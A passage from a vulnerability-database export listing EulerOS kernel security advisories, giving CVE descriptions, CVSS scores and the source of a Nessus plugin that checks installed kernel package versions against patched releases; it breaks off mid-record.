DiSEqC command is 6, according to the userspace\n API. However, the code allows larger values such as\n 23.(CVE-2015-9289)In the Linux kernel through 5.3.2,\n cfg80211_mgd_wext_giwessid in net/wireless/wext-sme.c\n does not reject a long SSID IE, leading to a Buffer\n Overflow.(CVE-2019-17133)Insufficient access control in\n the Intel(R) PROSet/Wireless WiFi Software driver\n before version 21.10 may allow an unauthenticated user\n to potentially enable denial of service via adjacent\n access.(CVE-2019-0136)Linux distributions that have not\n patched their long-term kernels with\n https://git.kernel.org/linus/a87938b2e246b81b4fb713edb3\n 71a9fa3c5c3c86 (committed on April 14, 2015). This\n kernel vulnerability was fixed in April 2015 by commit\n a87938b2e246b81b4fb713edb371a9fa3c5c3c86 (backported to\n Linux 3.10.77 in May 2015), but it was not recognized\n as a security threat. With\n CONFIG_ARCH_BINFMT_ELF_RANDOMIZE_PIE enabled, and a\n normal top-down address allocation strategy,\n load_elf_binary() will attempt to map a PIE binary into\n an address range immediately below mm->mmap_base.\n Unfortunately, load_elf_ binary() does not take account\n of the need to allocate sufficient space for the entire\n binary which means that, while the first PT_LOAD\n segment is mapped below mm->mmap_base, the subsequent\n PT_LOAD segment(s) end up being mapped above\n mm->mmap_base into the are that is supposed to be the\n 'gap' between the stack and the\n binary.(CVE-2017-1000253)Race condition in the\n sclp_ctl_ioctl_sccb function in\n drivers/s390/char/sclp_ctl.c in the Linux kernel before\n 4.6 allows local users to obtain sensitive information\n from kernel memory by changing a certain length value,\n aka a 'double fetch'\n vulnerability.(CVE-2016-6130)rtl_p2p_noa_ie in drivers\n et/wireless/realtek/rtlwifi/ps.c in the Linux kernel\n through 5.3.6 lacks a certain upper-bound check,\n leading to a buffer\n overflow.(CVE-2019-17666)sound/core/timer.c in the\n Linux kernel through 4.6 does not initialize certain r1\n data structures, which allows local users to obtain\n sensitive information from kernel stack memory via\n crafted use of the ALSA timer interface, related to the\n (1) snd_timer_user_ccallback and (2)\n snd_timer_user_tinterrupt\n functions.(CVE-2016-4578)Systems with microprocessors\n utilizing speculative execution and branch prediction\n may allow unauthorized disclosure of information to an\n attacker with local user access via a side-channel\n analysis.(CVE-2017-5753)The acm_probe function in\n drivers/usb/class/cdc-acm.c in the Linux kernel before\n 4.5.1 allows physically proximate attackers to cause a\n denial of service (NULL pointer dereference and system\n crash) via a USB device without both a control and a\n data endpoint descriptor.(CVE-2016-3138)The\n arcmsr_iop_message_xfer function in\n drivers/scsi/arcmsr/arcmsr_hba.c in the Linux kernel\n through 4.8.2 does not restrict a certain length field,\n which allows local users to gain privileges or cause a\n denial of service (heap-based buffer overflow) via an\n ARCMSR_MESSAGE_WRITE_WQBUFFER control\n code.(CVE-2016-7425)The ati_remote2_probe function in\n drivers/input/misc/ati_remote2.c in the Linux kernel\n before 4.5.1 allows physically proximate attackers to\n cause a denial of service (NULL pointer dereference and\n system crash) via a crafted endpoints value in a USB\n device descriptor.(CVE-2016-2185)The\n create_fixed_stream_quirk function in\n sound/usb/quirks.c in the snd-usb-audio driver in the\n Linux kernel before 4.5.1 allows physically proximate\n attackers to cause a denial of service (NULL pointer\n dereference or double free, and system crash) via a\n crafted endpoints value in a USB device\n descriptor.(CVE-2016-2184)The digi_port_init function\n in drivers/usb/serial/digi_acceleport.c in the Linux\n kernel before 4.5.1 allows physically proximate\n attackers to cause a denial of service (NULL pointer\n dereference and system crash) via a crafted endpoints\n value in a USB device descriptor.(CVE-2016-3140)The\n do_remount function in fsamespace.c in the Linux kernel\n through 3.16.1 does not maintain the MNT_LOCK_READONLY\n bit across a remount of a bind mount, which allows\n local users to bypass an intended read-only restriction\n and defeat certain sandbox protection mechanisms via a\n 'mount -o remount' command within a user\n namespace.(CVE-2014-5206)The gtco_probe function in\n drivers/input/tablet/gtco.c in the Linux kernel through\n 4.5.2 allows physically proximate attackers to cause a\n denial of service (NULL pointer dereference and system\n crash) via a crafted endpoints value in a USB device\n descriptor.(CVE-2016-2187)The hub_activate function in\n drivers/usb/core/hub.c in the Linux kernel before 4.3.5\n does not properly maintain a hub-interface data\n structure, which allows physically proximate attackers\n to cause a denial of service (invalid memory access and\n system crash) or possibly have unspecified other impact\n by unplugging a USB hub device.(CVE-2015-8816)The\n ims_pcu_parse_cdc_data function in\n drivers/input/misc/ims-pcu.c in the Linux kernel before\n 4.5.1 allows physically proximate attackers to cause a\n denial of service (system crash) via a USB device\n without both a master and a slave\n interface.(CVE-2016-3689)The Linux Kernel running on\n AMD64 systems will sometimes map the contents of PIE\n executable, the heap or ld.so to where the stack is\n mapped allowing attackers to more easily manipulate the\n stack. Linux Kernel version 4.11.5 is\n affected.(CVE-2017-1000379)The powermate_probe function\n in drivers/input/misc/powermate.c in the Linux kernel\n before 4.5.1 allows physically proximate attackers to\n cause a denial of service (NULL pointer dereference and\n system crash) via a crafted endpoints value in a USB\n device descriptor.(CVE-2016-2186)The signal\n implementation in the Linux kernel before 4.3.5 on\n powerpc platforms does not check for an MSR with both\n the S and T bits set, which allows local users to cause\n a denial of service (TM Bad Thing exception and panic)\n via a crafted application.(CVE-2015-8844)The\n snd_timer_user_params function in sound/core/timer.c in\n the Linux kernel through 4.6 does not initialize a\n certain data structure, which allows local users to\n obtain sensitive information from kernel stack memory\n via crafted use of the ALSA timer\n interface.(CVE-2016-4569)The tm_reclaim_thread function\n in arch/powerpc/kernel/process.c in the Linux kernel\n before 4.4.1 on powerpc platforms does not ensure that\n TM suspend mode exists before proceeding with a\n tm_reclaim call, which allows local users to cause a\n denial of service (TM Bad Thing exception and panic)\n via a crafted application.(CVE-2015-8845)The VFS\n subsystem in the Linux kernel 3.x provides an\n incomplete set of requirements for setattr operations\n that underspecifies removing extended privilege\n attributes, which allows local users to cause a denial\n of service (capability stripping) via a failed\n invocation of a system call, as demonstrated by using\n chown to remove a capability from the ping or Wireshark\n dumpcap program.(CVE-2015-1350)The wacom_probe function\n in drivers/input/tablet/wacom_sys.c in the Linux kernel\n before 3.17 allows physically proximate attackers to\n cause a denial of service (NULL pointer dereference and\n system crash) via a crafted endpoints value in a USB\n device descriptor.(CVE-2016-3139)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 11, "cvss3": {"score": 8.8, "vector": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-12-18T00:00:00", "title": "EulerOS 2.0 SP3 : kernel (EulerOS-SA-2019-2599)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2384", "CVE-2017-5753", "CVE-2015-3332", "CVE-2017-18595", "CVE-2019-0136", "CVE-2019-17666", "CVE-2016-3689", "CVE-2016-3139", "CVE-2015-9289", "CVE-2017-18551", "CVE-2016-2186", "CVE-2016-2187", "CVE-2014-5206", "CVE-2016-4569", "CVE-2016-7425", "CVE-2017-1000379", "CVE-2016-2184", "CVE-2017-1000253", "CVE-2019-17075", "CVE-2015-1350", "CVE-2014-4608", "CVE-2016-6197", "CVE-2018-14617", "CVE-2016-3138", "CVE-2016-3140", "CVE-2017-18509", "CVE-2016-4578", "CVE-2014-5207", "CVE-2015-8816", "CVE-2016-2185", "CVE-2016-6130", "CVE-2015-8844", "CVE-2015-8845", "CVE-2017-13168", "CVE-2019-17133"], "modified": "2019-12-18T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:python-perf", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "p-cpe:/a:huawei:euleros:kernel-debuginfo", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2019-2599.NASL", "href": "https://www.tenable.com/plugins/nessus/132134", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132134);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2014-4608\",\n \"CVE-2014-5206\",\n \"CVE-2014-5207\",\n \"CVE-2015-1350\",\n \"CVE-2015-3332\",\n \"CVE-2015-8816\",\n \"CVE-2015-8844\",\n \"CVE-2015-8845\",\n \"CVE-2015-9289\",\n \"CVE-2016-2184\",\n \"CVE-2016-2185\",\n \"CVE-2016-2186\",\n \"CVE-2016-2187\",\n \"CVE-2016-2384\",\n \"CVE-2016-3138\",\n \"CVE-2016-3139\",\n \"CVE-2016-3140\",\n \"CVE-2016-3689\",\n \"CVE-2016-4569\",\n \"CVE-2016-4578\",\n \"CVE-2016-6130\",\n \"CVE-2016-6197\",\n \"CVE-2016-7425\",\n \"CVE-2017-1000253\",\n \"CVE-2017-1000379\",\n \"CVE-2017-13168\",\n \"CVE-2017-18509\",\n \"CVE-2017-18551\",\n \"CVE-2017-18595\",\n \"CVE-2017-5753\",\n \"CVE-2018-14617\",\n \"CVE-2019-0136\",\n \"CVE-2019-17075\",\n \"CVE-2019-17133\",\n \"CVE-2019-17666\"\n );\n script_bugtraq_id(\n 68214,\n 69214,\n 69216,\n 74232\n );\n\n script_name(english:\"EulerOS 2.0 SP3 : kernel (EulerOS-SA-2019-2599)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - The kernel package contains the Linux kernel (vmlinuz),\n the core of any Linux operating system. The kernel\n handles the basic functions of the operating system:\n memory allocation, process allocation, device input and\n output, etc.Security Fix(es):** DISPUTED ** Multiple\n integer overflows in the lzo1x_decompress_safe function\n in lib/lzo/lzo1x_decompress_safe.c in the LZO\n decompressor in the Linux kernel before 3.15.2 allow\n context-dependent attackers to cause a denial of\n service (memory corruption) via a crafted Literal Run.\n NOTE: the author of the LZO algorithms says 'the Linux\n kernel is *not* affected media hype.'(CVE-2014-4608)A\n certain backport in the TCP Fast Open implementation\n for the Linux kernel before 3.18 does not properly\n maintain a count value, which allow local users to\n cause a denial of service (system crash) via the Fast\n Open feature, as demonstrated by visiting the\n chrome://flags/#enable-tcp-fast-open URL when using\n certain 3.10.x through 3.16.x kernel builds, including\n longterm-maintenance releases and ckt (aka Canonical\n Kernel Team) builds.(CVE-2015-3332)An elevation of\n privilege vulnerability in the kernel scsi driver.\n Product: Android. Versions: Android kernel. Android ID\n A-65023233.(CVE-2017-13168)An issue was discovered in\n drivers/i2c/i2c-core-smbus.c in the Linux kernel before\n 4.14.15. There is an out of bounds write in the\n function i2c_smbus_xfer_emulated.(CVE-2017-18551)An\n issue was discovered in net/ipv6/ip6mr.c in the Linux\n kernel before 4.11. By setting a specific socket\n option, an attacker can control a pointer in kernel\n land and cause an inet_csk_listen_stop general\n protection fault, or potentially execute arbitrary code\n under certain circumstances. The issue can be triggered\n as root (e.g., inside a default LXC container or with\n the CAP_NET_ADMIN capability) or after namespace\n unsharing. This occurs because sk_type and protocol are\n not checked in the appropriate part of the ip6_mroute_*\n functions. NOTE: this affects Linux distributions that\n use 4.9.x longterm kernels before\n 4.9.187.(CVE-2017-18509)An issue was discovered in the\n Linux kernel before 4.14.11. A double free may be\n caused by the function allocate_trace_buffer in the\n file kernel/trace/trace.c.(CVE-2017-18595)An issue was\n discovered in the Linux kernel through 4.17.10. There\n is a NULL pointer dereference and panic in\n hfsplus_lookup() in fs/hfsplus/dir.c when opening a\n file (that is purportedly a hard link) in an hfs+\n filesystem that has malformed catalog data, and is\n mounted read-only without a metadata\n directory.(CVE-2018-14617)An issue was discovered in\n write_tpt_entry in drivers/infiniband/hw/cxgb4/mem.c in\n the Linux kernel through 5.3.2. The cxgb4 driver is\n directly calling dma_map_single (a DMA function) from a\n stack variable. This could allow an attacker to trigger\n a Denial of Service, exploitable if this driver is used\n on an architecture for which this stack/DMA interaction\n has security relevance.(CVE-2019-17075)Double free\n vulnerability in the snd_usbmidi_create function in\n sound/usb/midi.c in the Linux kernel before 4.5 allows\n physically proximate attackers to cause a denial of\n service (panic) or possibly have unspecified other\n impact via vectors involving an invalid USB\n descriptor.(CVE-2016-2384)fsamespace.c in the Linux\n kernel through 3.16.1 does not properly restrict\n clearing MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and\n changing MNT_ATIME_MASK during a remount of a bind\n mount, which allows local users to gain privileges,\n interfere with backups and auditing on systems that had\n atime enabled, or cause a denial of service (excessive\n filesystem updating) on systems that had atime disabled\n via a 'mount -o remount' command within a user\n namespace.(CVE-2014-5207)fs/overlayfs/dir.c in the\n OverlayFS filesystem implementation in the Linux kernel\n before 4.6 does not properly verify the upper dentry\n before proceeding with unlink and rename system-call\n processing, which allows local users to cause a denial\n of service (system crash) via a rename system call that\n specifies a self-hardlink.(CVE-2016-6197)In the Linux\n kernel before 4.1.4, a buffer overflow occurs when\n checking userspace params in\n drivers/media/dvb-frontends/cx24116.c. The maximum size\n for a DiSEqC command is 6, according to the userspace\n API. However, the code allows larger values such as\n 23.(CVE-2015-9289)In the Linux kernel through 5.3.2,\n cfg80211_mgd_wext_giwessid in net/wireless/wext-sme.c\n does not reject a long SSID IE, leading to a Buffer\n Overflow.(CVE-2019-17133)Insufficient access control in\n the Intel(R) PROSet/Wireless WiFi Software driver\n before version 21.10 may allow an unauthenticated user\n to potentially enable denial of service via adjacent\n access.(CVE-2019-0136)Linux distributions that have not\n patched their long-term kernels with\n https://git.kernel.org/linus/a87938b2e246b81b4fb713edb3\n 71a9fa3c5c3c86 (committed on April 14, 2015). This\n kernel vulnerability was fixed in April 2015 by commit\n a87938b2e246b81b4fb713edb371a9fa3c5c3c86 (backported to\n Linux 3.10.77 in May 2015), but it was not recognized\n as a security threat. With\n CONFIG_ARCH_BINFMT_ELF_RANDOMIZE_PIE enabled, and a\n normal top-down address allocation strategy,\n load_elf_binary() will attempt to map a PIE binary into\n an address range immediately below mm->mmap_base.\n Unfortunately, load_elf_ binary() does not take account\n of the need to allocate sufficient space for the entire\n binary which means that, while the first PT_LOAD\n segment is mapped below mm->mmap_base, the subsequent\n PT_LOAD segment(s) end up being mapped above\n mm->mmap_base into the are that is supposed to be the\n 'gap' between the stack and the\n binary.(CVE-2017-1000253)Race condition in the\n sclp_ctl_ioctl_sccb function in\n drivers/s390/char/sclp_ctl.c in the Linux kernel before\n 4.6 allows local users to obtain sensitive information\n from kernel memory by changing a certain length value,\n aka a 'double fetch'\n vulnerability.(CVE-2016-6130)rtl_p2p_noa_ie in drivers\n et/wireless/realtek/rtlwifi/ps.c in the Linux kernel\n through 5.3.6 lacks a certain upper-bound check,\n leading to a buffer\n overflow.(CVE-2019-17666)sound/core/timer.c in the\n Linux kernel through 4.6 does not initialize certain r1\n data structures, which allows local users to obtain\n sensitive information from kernel stack memory via\n crafted use of the ALSA timer interface, related to the\n (1) snd_timer_user_ccallback and (2)\n snd_timer_user_tinterrupt\n functions.(CVE-2016-4578)Systems with microprocessors\n utilizing speculative execution and branch prediction\n may allow unauthorized disclosure of information to an\n attacker with local user access via a side-channel\n analysis.(CVE-2017-5753)The acm_probe function in\n drivers/usb/class/cdc-acm.c in the Linux kernel before\n 4.5.1 allows physically proximate attackers to cause a\n denial of service (NULL pointer dereference and system\n crash) via a USB device without both a control and a\n data endpoint descriptor.(CVE-2016-3138)The\n arcmsr_iop_message_xfer function in\n drivers/scsi/arcmsr/arcmsr_hba.c in the Linux kernel\n through 4.8.2 does not restrict a certain length field,\n which allows local users to gain privileges or cause a\n denial of service (heap-based buffer overflow) via an\n ARCMSR_MESSAGE_WRITE_WQBUFFER control\n code.(CVE-2016-7425)The ati_remote2_probe function in\n drivers/input/misc/ati_remote2.c in the Linux kernel\n before 4.5.1 allows physically proximate attackers to\n cause a denial of service (NULL pointer dereference and\n system crash) via a crafted endpoints value in a USB\n device descriptor.(CVE-2016-2185)The\n create_fixed_stream_quirk function in\n sound/usb/quirks.c in the snd-usb-audio driver in the\n Linux kernel before 4.5.1 allows physically proximate\n attackers to cause a denial of service (NULL pointer\n dereference or double free, and system crash) via a\n crafted endpoints value in a USB device\n descriptor.(CVE-2016-2184)The digi_port_init function\n in drivers/usb/serial/digi_acceleport.c in the Linux\n kernel before 4.5.1 allows physically proximate\n attackers to cause a denial of service (NULL pointer\n dereference and system crash) via a crafted endpoints\n value in a USB device descriptor.(CVE-2016-3140)The\n do_remount function in fsamespace.c in the Linux kernel\n through 3.16.1 does not maintain the MNT_LOCK_READONLY\n bit across a remount of a bind mount, which allows\n local users to bypass an intended read-only restriction\n and defeat certain sandbox protection mechanisms via a\n 'mount -o remount' command within a user\n namespace.(CVE-2014-5206)The gtco_probe function in\n drivers/input/tablet/gtco.c in the Linux kernel through\n 4.5.2 allows physically proximate attackers to cause a\n denial of service (NULL pointer dereference and system\n crash) via a crafted endpoints value in a USB device\n descriptor.(CVE-2016-2187)The hub_activate function in\n drivers/usb/core/hub.c in the Linux kernel before 4.3.5\n does not properly maintain a hub-interface data\n structure, which allows physically proximate attackers\n to cause a denial of service (invalid memory access and\n system crash) or possibly have unspecified other impact\n by unplugging a USB hub device.(CVE-2015-8816)The\n ims_pcu_parse_cdc_data function in\n drivers/input/misc/ims-pcu.c in the Linux kernel before\n 4.5.1 allows physically proximate attackers to cause a\n denial of service (system crash) via a USB device\n without both a master and a slave\n interface.(CVE-2016-3689)The Linux Kernel running on\n AMD64 systems will sometimes map the contents of PIE\n executable, the heap or ld.so to where the stack is\n mapped allowing attackers to more easily manipulate the\n stack. Linux Kernel version 4.11.5 is\n affected.(CVE-2017-1000379)The powermate_probe function\n in drivers/input/misc/powermate.c in the Linux kernel\n before 4.5.1 allows physically proximate attackers to\n cause a denial of service (NULL pointer dereference and\n system crash) via a crafted endpoints value in a USB\n device descriptor.(CVE-2016-2186)The signal\n implementation in the Linux kernel before 4.3.5 on\n powerpc platforms does not check for an MSR with both\n the S and T bits set, which allows local users to cause\n a denial of service (TM Bad Thing exception and panic)\n via a crafted application.(CVE-2015-8844)The\n snd_timer_user_params function in sound/core/timer.c in\n the Linux kernel through 4.6 does not initialize a\n certain data structure, which allows local users to\n obtain sensitive information from kernel stack memory\n via crafted use of the ALSA timer\n interface.(CVE-2016-4569)The tm_reclaim_thread function\n in arch/powerpc/kernel/process.c in the Linux kernel\n before 4.4.1 on powerpc platforms does not ensure that\n TM suspend mode exists before proceeding with a\n tm_reclaim call, which allows local users to cause a\n denial of service (TM Bad Thing exception and panic)\n via a crafted application.(CVE-2015-8845)The VFS\n subsystem in the Linux kernel 3.x provides an\n incomplete set of requirements for setattr operations\n that underspecifies removing extended privilege\n attributes, which allows local users to cause a denial\n of service (capability stripping) via a failed\n invocation of a system call, as demonstrated by using\n chown to remove a capability from the ping or Wireshark\n dumpcap program.(CVE-2015-1350)The wacom_probe function\n in drivers/input/tablet/wacom_sys.c in the Linux kernel\n before 3.17 allows physically proximate attackers to\n cause a denial of service (NULL pointer dereference and\n system crash) via a crafted endpoints value in a USB\n device descriptor.(CVE-2016-3139)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2599\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fc6af25f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(3)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-514.44.5.10.h234\",\n \"kernel-debuginfo-3.10.0-514.44.5.10.h234\",\n \"kernel-debuginfo-common-x86_64-3.10.0-514.44.5.10.h234\",\n \"kernel-devel-3.10.0-514.44.5.10.h234\",\n \"kernel-headers-3.10.0-514.44.5.10.h234\",\n \"kernel-tools-3.10.0-514.44.5.10.h234\",\n \"kernel-tools-libs-3.10.0-514.44.5.10.h234\",\n \"perf-3.10.0-514.44.5.10.h234\",\n \"python-perf-3.10.0-514.44.5.10.h234\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"3\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T09:04:54", "description": "According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - The kernel package contains the Linux kernel (vmlinuz),\n the core of any Linux operating system. The kernel\n handles the basic functions of the operating system:\n memory allocation, process allocation, device input and\n output, etc.Security Fix(es):In the Linux kernel before\n 5.5.8, get_raw_socket in drivers/vhost/ net.c lacks\n validation of an sk_family field, which might allow\n attackers to trigger kernel stack corruption via\n crafted system calls.(CVE-2020-10942)In the Linux\n kernel 5.0.21, a setxattr operation, after a mount of a\n crafted ext4 image, can cause a slab-out-of-bounds\n write access because of an ext4_xattr_set_entry\n use-after-free in fs/ext4/xattr.c when a large old_size\n value is used in a memset call.(CVE-2019-19319)In\n kernel/compat.c in the Linux kernel before 3.17, as\n used in Google Chrome OS and other products, there is a\n possible out-of-bounds read. restart_syscall uses\n uninitialized data when restarting\n compat_sys_nanosleep. NOTE: this is disputed because\n the code path is unreachable.(CVE-2014-3180)In the\n Linux kernel 5.4.0-rc2, there is a use-after-free\n (read) in the __blk_add_trace function in\n kernel/trace/blktrace.c (which is used to fill out a\n blk_io_trace structure and place it in a per-cpu\n sub-buffer).(CVE-2019-19768)There is a use-after-free\n vulnerability in the Linux kernel through 5.5.2 in the\n vc_do_resize function in\n drivers/tty/vt/vt.c.(CVE-2020-8647)There is a\n use-after-free vulnerability in the Linux kernel\n through 5.5.2 in the vgacon_invert_region function in\n drivers/video/console/vgacon.c.(CVE-2020-8649)drivers/g\n pu/drm/radeon/radeon_display.c in the Linux kernel\n 5.2.14 does not check the alloc_workqueue return value,\n leading to a NULL pointer dereference. NOTE: A\n third-party software maintainer states that the work\n queue allocation is happening during device\n initialization, which for a graphics card occurs during\n boot. It is not attacker controllable and OOM at that\n time is highly unlikely.(CVE-2019-16230)There is a\n use-after-free vulnerability in the Linux kernel\n through 5.5.2 in the n_tty_receive_buf_common function\n in drivers/tty/ n_tty.c.(CVE-2020-8648)A flaw was\n discovered in the way that the KVM hypervisor handled\n instruction emulation for an L2 guest when nested\n virtualisation is enabled. Under some circumstances, an\n L2 guest may trick the L0 guest into accessing\n sensitive L1 resources that should be inaccessible to\n the L2 guest.(CVE-2020-2732)An issue was discovered in\n the Linux kernel through 5.5.6. set_fdc in\n drivers/block/floppy.c leads to a wait_til_ready\n out-of-bounds read because the FDC index is not checked\n for errors before assigning it, aka\n CID-2e90ca68b0d2.(CVE-2020-9383)ext4_protect_reserved_i\n node in fs/ext4/block_validity.c in the Linux kernel\n through 5.5.3 allows attackers to cause a denial of\n service (soft lockup) via a crafted journal\n size.(CVE-2020-8992)Wi-Fi Protected Access (WPA and\n WPA2) allows reinstallation of the Group Temporal Key\n (GTK) during the group key handshake, allowing an\n attacker within radio range to replay frames from\n access points to clients.(CVE-2017-13080)Linux Kernel\n version 3.18 to 4.16 incorrectly handles an SG_IO ioctl\n on /dev/sg0 with dxfer_direction=SG_DXFER_FROM_DEV and\n an empty 6-byte cmdp. This may lead to copying up to\n 1000 kernel heap pages to the userspace. This has been\n fixed upstream in\n https://github.com/torvalds/linux/commit/a45b599ad808c3\n c982fdcdc12b0b8611c2f92824 already. The problem has\n limited scope, as users don't usually have permissions\n to access SCSI devices. On the other hand, e.g. the\n Nero user manual suggests doing `chmod o+r+w /dev/sg*`\n to make the devices accessible. NOTE: third parties\n dispute the relevance of this report, noting that the\n requirement for an attacker to have both the\n CAP_SYS_ADMIN and CAP_SYS_RAWIO capabilities makes it\n 'virtually impossible to exploit.'(CVE-2018-1000204)The\n Linux kernel through 5.3.13 has a start_offset+size\n Integer Overflow in cpia2_remap_buffer in\n drivers/media/usb/cpia2/cpia2_core.c because cpia2 has\n its own mmap implementation. This allows local users\n (with /dev/video0 access) to obtain read and write\n permissions on kernel physical pages, which can\n possibly result in a privilege\n escalation.(CVE-2019-18675)arch/x86/kvm/emulate.c in\n the Linux kernel before 4.8.12 does not properly\n initialize Code Segment (CS) in certain error cases,\n which allows local users to obtain sensitive\n information from kernel stack memory via a crafted\n application.(CVE-2016-9756)Double free vulnerability in\n drivers/ net/usb/cdc_ncm.c in the Linux kernel before\n 4.5 allows physically proximate attackers to cause a\n denial of service (system crash) or possibly have\n unspecified other impact by inserting a USB device with\n an invalid USB descriptor.(CVE-2016-3951)Linux Kernel\n contains an out-of-bounds read flaw in the\n asn1_ber_decoder() function in lib/asn1_decoder.c that\n is triggered when decoding ASN.1 data. This may allow a\n remote attacker to disclose potentially sensitive\n memory contents.(CVE-2018-9383)Linux Kernel contains a\n flaw in the ip6_setup_cork() function in\n net/ipv6/ip6_output.c that is triggered when handling\n too small IPv6 MTU sizes. This may allow a local\n attacker to cause a crash or potentially gain elevated\n privileges.(CVE-2018-9389)In the Android kernel in the\n video driver there is a use after free due to a race\n condition. This could lead to local escalation of\n privilege with no additional execution 